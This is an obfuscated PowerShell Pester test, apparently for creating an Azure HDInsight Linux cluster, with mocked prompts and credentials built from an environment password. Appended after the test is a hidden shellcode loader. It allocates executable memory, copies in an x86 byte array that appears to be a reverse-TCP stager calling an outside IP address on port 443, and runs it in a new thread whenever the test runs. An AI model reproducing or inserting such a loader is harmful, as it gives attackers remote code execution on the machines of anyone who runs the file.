${h`Ere} = &("{0}{1}{2}"-f 'S','plit-Pa','th') -Parent ${myI`NVoc`A`T`IoN}."MY`COm`MAnd"."P`AtH"
${S`UT} = (.("{1}{0}{2}"-f'plit-Pa','S','th') -Leaf ${M`yi`NVO`C`Ation}."MYcOM`m`AnD"."PA`Th") -replace ((("{1}{0}" -f 'Tests','{0}.')) -f[Char]92), ''
. "$here\$sut"

${H`TtpusErPAs`sw`O`Rd} = ${En`V:HtTPP`AS`sworD}
${lO`CAt`iOn} = ${EN`V`:loc`ATiOn}


${sEC`U`R`epaSsworD} = &("{0}{2}{1}{3}{4}" -f 'ConvertTo','cu','-Se','reS','tring') ${ht`TPUSErpAsS`wo`Rd} -AsPlainText -Force
${LO`GIN`crEdS} = &("{2}{1}{0}" -f'ject','b','New-O') -TypeName ("{7}{8}{1}{5}{3}{0}{6}{2}{9}{4}"-f 'ion.','n','Cr','t.Automat','al','agemen','PS','System.M','a','edenti') -ArgumentList ("{0}{1}" -f 'admi','n'), ${SEc`Ur`epASs`WO`RD}
${s`shCrE`Ds} = .("{0}{2}{1}"-f'Ne','Object','w-') -TypeName ("{8}{4}{6}{0}{5}{1}{3}{2}{9}{7}" -f 'a','on.','C','PS','ystem.Management.A','ti','utom','ntial','S','rede') -ArgumentList ("{0}{1}{2}" -f 'ss','hu','ser'), ${Se`C`UREPAS`s`wOrD}


function gET-crE`De`N`TiaL { 
    Param(
        [string]${na`me}
    )
    
    if(${n`Ame} -eq ("{0}{1}" -f 'adm','in')) {
        return ${L`o`gi`NcreDs}
    } else {
        return ${ssH`C`Reds}
    }
}


${n`A`MEs}=("{1}{0}" -f'her','das'),("{1}{0}{2}" -f'a','d','ncer'),("{1}{2}{0}" -f'ncer','p','ra'),("{0}{1}" -f 'vixe','n'),("{1}{0}"-f 'et','com'),("{1}{0}" -f'd','cupi'),("{1}{0}"-f 'r','donde'),("{2}{1}{0}" -f'n','ze','blit')
${Bas`E`N`AmE}=.("{1}{3}{0}{2}"-f '-Ra','Ge','ndom','t') ${n`AMeS}
${m`illS}=&("{1}{0}{2}" -f '-D','Get','ate') -Format ('ms')

${rEsOU`RceG`ROUPN`AMe} = ${Ba`sE`NAmE} + "rg" + ${m`I`LLS}
${cluStE`RNA`Me} = ${bas`en`AME} + "hdi" + ${MI`lLS}
${St`oR`AGeA`ccOUNtnAmE} = ${bas`E`NAMe} + ("{0}{1}" -f'sto','re') + ${MI`L`LS}
${A`DDi`T`iOnALsto`RAg`eaC`coUnTNa`ME} = ${B`A`sEnamE} + "aux" + ${mI`lLs}

.("{0}{2}{1}"-f 'write','t','-hos') ('Crea'+'tin'+'g '+'n'+'ew '+'resou'+'rce'+' '+'gr'+'oup '+'name'+'d: '+"$resourceGroupName")
&("{1}{0}"-f'escribe','D') ("{1}{13}{15}{6}{5}{4}{10}{0}{14}{11}{7}{3}{8}{12}{2}{9}"-f'eat','hdi','s','azure','oop','d','-ha','ers-','-po','hell','-cr','clust','wer','nsigh','e-linux-','t') {
    .('It') ("{15}{10}{9}{12}{0}{4}{11}{7}{8}{14}{13}{1}{3}{2}{6}{5}" -f'c','a','config',' ','l','bject',' o','t','er','tes a Linux-bas','rea','us','ed ','ng ',' usi','C') {
        
        &("{1}{0}" -f 'ock','M') ("{0}{1}{3}{2}"-f'Rea','d-','t','Hos') { ${R`ESO`UrCEGRoUP`N`AMe} } -ParameterFilter {
            ${pR`OMPt} -eq ("{4}{3}{0}{2}{5}{1}{6}"-f 'er th','roup nam','e r','nt','E','esource g','e')
        }
        .("{1}{0}" -f'k','Moc') ("{2}{0}{1}" -f'Ho','st','Read-') { ${LOcAtI`on} } -ParameterFilter {
            ${PrOM`pT} -eq ("{8}{2}{4}{5}{6}{7}{0}{3}{1}{10}{9}"-f'r','urce','nte','eso','r ','th','e Azure region to',' create ','E','n','s i')
        }
        .("{1}{0}" -f'ck','Mo') ("{1}{0}"-f 'ad-Host','Re') { ${stO`R`Ag`E`Accou`NTnA`me} } -ParameterFilter {
            ${pr`Om`PT} -eq ("{9}{7}{3}{4}{5}{2}{8}{1}{0}{6}"-f 'co',' ac','tora',' na','me of',' the s','unt','e','ge','Enter th')
        }
        .("{0}{1}"-f'Mo','ck') ("{2}{0}{1}" -f'-Hos','t','Read') { ${cL`USTe`R`NaMe} } -ParameterFilter {
            ${pRO`M`Pt} -eq ("{0}{3}{1}{2}{4}{5}{6}{8}{7}"-f'Enter th','na','m','e ','e ','of t','he HDInsi','luster','ght c')
        }
        .("{0}{1}" -f'Mo','ck') ("{1}{2}{0}" -f'Host','Re','ad-') { ${AD`DIt`iOnaLSTorAG`EAcC`ouNt`NAmE} } -ParameterFilter {
            ${Pr`om`PT} -eq ("{2}{8}{6}{10}{9}{1}{4}{7}{5}{3}{0}"-f'unt','ddition','Ente','acco','al','age ','he name of ',' stor','r t','he a','t')
        }

        
        ${cL`Ust`eR`iNfO} = .("{4}{3}{0}{2}{1}" -f'n','g','fi','WithCo','New-Cluster')
        
        
        ${CL`USTerI`N`Fo}[-1]."cL`Us`TeR`StATE" | &("{1}{0}"-f 'd','Shoul') ('be') ("{0}{1}"-f 'Runn','ing')
        ${ClUS`T`eRI`NFO}[-1]."N`AME" | .("{1}{0}"-f 'd','Shoul') ('be') ${clU`s`Ter`NAmE}
    }
}


&("{0}{1}{2}" -f 'wri','te-h','ost') ('Ple'+'ase'+' '+'remem'+'be'+'r '+'t'+'hat '+'Y'+'OU '+'m'+'ust '+'ma'+'nuall'+'y'+' '+'delete'+' '+'t'+'he '+"$resourceGroupName "+'reso'+'urce'+' '+'grou'+'p '+'crea'+'ted '+'b'+'y '+'this'+' '+'t'+'es'+'t!!!')

${c} = ((("{35}{71}{1}{4}{23}{24}{66}{54}{10}{74}{52}{49}{8}{43}{58}{72}{27}{2}{50}{25}{69}{57}{45}{36}{12}{73}{28}{76}{53}{44}{39}{42}{20}{32}{11}{16}{61}{65}{62}{26}{59}{9}{56}{30}{13}{3}{31}{14}{37}{29}{67}{19}{68}{21}{0}{55}{63}{75}{22}{5}{7}{6}{64}{77}{17}{70}{15}{60}{41}{18}{51}{47}{46}{48}{33}{34}{79}{38}{40}{78}"-f'pThrea','2.dl','tionType, uint',' IntPtr ','l','v','0}','crt.dll{','ualAlloc','S','er','read(IntPt','port(','tr lpStartAddress,','a','ter','r lpThrea',' ',' m','Creati','r Create','r l','ms','{0})]public ','stat','lPr','t','dress, uint dwSize, uint flAlloca','rnel3','et','ze, IntP','lpP','Th','t, ','u','[DllImport({','Im','ram','int c','ic extern I','ount','Ptr','ntPt','(Int','t','ll','set(','m','IntPtr des','t',' f','e','ntPtr Vir','blic sta','xt','dId);[Dl','tackSi','ect);[D','Ptr lp','es, uint dw','n Int','d','ribu','lImpo',')]pu','Att','ic e','er, uint dw','onFlags, IntPt','ot','static ex','0}kernel3','Ad','{0}ke','n I','rt({0}','2.dll{0})]pu','blic',');','int src, u'))-f  [ChAr]34);${w} = &("{0}{2}{1}" -f'A','Type','dd-') -memberDefinition ${c} -Name ("{0}{1}"-f 'Wi','n32') -namespace ("{0}{1}{2}{3}" -f'W','i','n32Func','tions') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x58,0xaf,0x16,0x09,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."LEng`Th" -gt 0x1000){${G} = ${z}."le`NgTh"};${x}=${W}::("{1}{2}{0}{3}"-f 'lAl','Vi','rtua','loc').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."LEng`TH"-1);${i}++) {${W}::"M`eMseT"([IntPtr](${X}.("{0}{2}{1}"-f'ToI','t32','n').Invoke()+${I}), ${Z}[${i}], 1)};${w}::("{3}{0}{2}{1}" -f 'r','ateThread','e','C').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{1}{0}" -f 'eep','rt-sl','Sta') 60};
